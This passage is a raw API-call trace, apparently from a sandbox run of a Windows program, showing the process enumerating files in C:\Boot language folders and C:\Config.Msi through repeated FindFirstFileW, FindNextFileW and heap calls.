ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.316] FindClose (in: hFindFile=0x6f5500 | out: hFindFile=0x6f5500) returned 1 [0035.316] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39306e8 | out: hHeap=0x600000) returned 1 [0035.316] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0035.316] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39306e8 [0035.316] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5500 [0035.316] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.316] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.317] FindClose (in: hFindFile=0x6f5500 | out: hFindFile=0x6f5500) returned 1 [0035.317] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39306e8 | out: hHeap=0x600000) returned 1 [0035.317] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0035.317] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39306e8 [0035.317] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5500 [0035.317] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.317] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.318] FindClose (in: hFindFile=0x6f5500 | out: hFindFile=0x6f5500) returned 1 [0035.318] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39306e8 | out: hHeap=0x600000) returned 1 [0035.318] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0035.318] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39306e8 [0035.318] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5500 [0035.318] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.318] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.318] FindClose (in: hFindFile=0x6f5500 | out: hFindFile=0x6f5500) returned 1 [0035.318] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39306e8 | out: hHeap=0x600000) returned 1 [0035.318] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0035.318] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39306e8 [0035.318] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5500 [0035.319] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.319] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.319] FindClose (in: hFindFile=0x6f5500 | out: hFindFile=0x6f5500) returned 1 [0035.319] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39306e8 | out: hHeap=0x600000) returned 1 [0035.319] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0035.319] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39306e8 [0035.319] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5500 [0035.320] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.320] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.320] FindClose (in: hFindFile=0x6f5500 | out: hFindFile=0x6f5500) returned 1 [0035.320] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39306e8 | out: hHeap=0x600000) returned 1 [0035.320] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0035.320] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39306e8 [0035.320] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5500 [0035.321] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.321] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.321] FindClose (in: hFindFile=0x6f5500 | out: hFindFile=0x6f5500) returned 1 [0035.321] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39306e8 | out: hHeap=0x600000) returned 1 [0035.321] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0035.321] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39306e8 [0035.321] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5500 [0035.321] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.321] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.321] FindClose (in: hFindFile=0x6f5500 | out: hFindFile=0x6f5500) returned 1 [0035.321] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39306e8 | out: hHeap=0x600000) returned 1 [0035.322] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0035.322] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39306e8 [0035.322] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5500 [0035.339] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.339] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.339] FindClose (in: hFindFile=0x6f5500 | out: hFindFile=0x6f5500) returned 1 [0035.339] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39306e8 | out: hHeap=0x600000) returned 1 [0035.339] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0035.339] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39306e8 [0035.339] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5500 [0035.339] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.339] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.340] FindClose (in: hFindFile=0x6f5500 | out: hFindFile=0x6f5500) returned 1 [0035.340] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39306e8 | out: hHeap=0x600000) returned 1 [0035.340] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0035.340] FindClose (in: hFindFile=0x6f44b8 | out: hFindFile=0x6f44b8) returned 1 [0035.340] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39206e0 | out: hHeap=0x600000) returned 1 [0035.340] FindNextFileW (in: hFindFile=0x6f3470, lpFindFileData=0x351fd00 | out: lpFindFileData=0x351fd00*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0035.340] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39206e0 [0035.340] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f44b8 [0035.340] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.340] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0035.340] FindClose (in: hFindFile=0x6f44b8 | out: hFindFile=0x6f44b8) returned 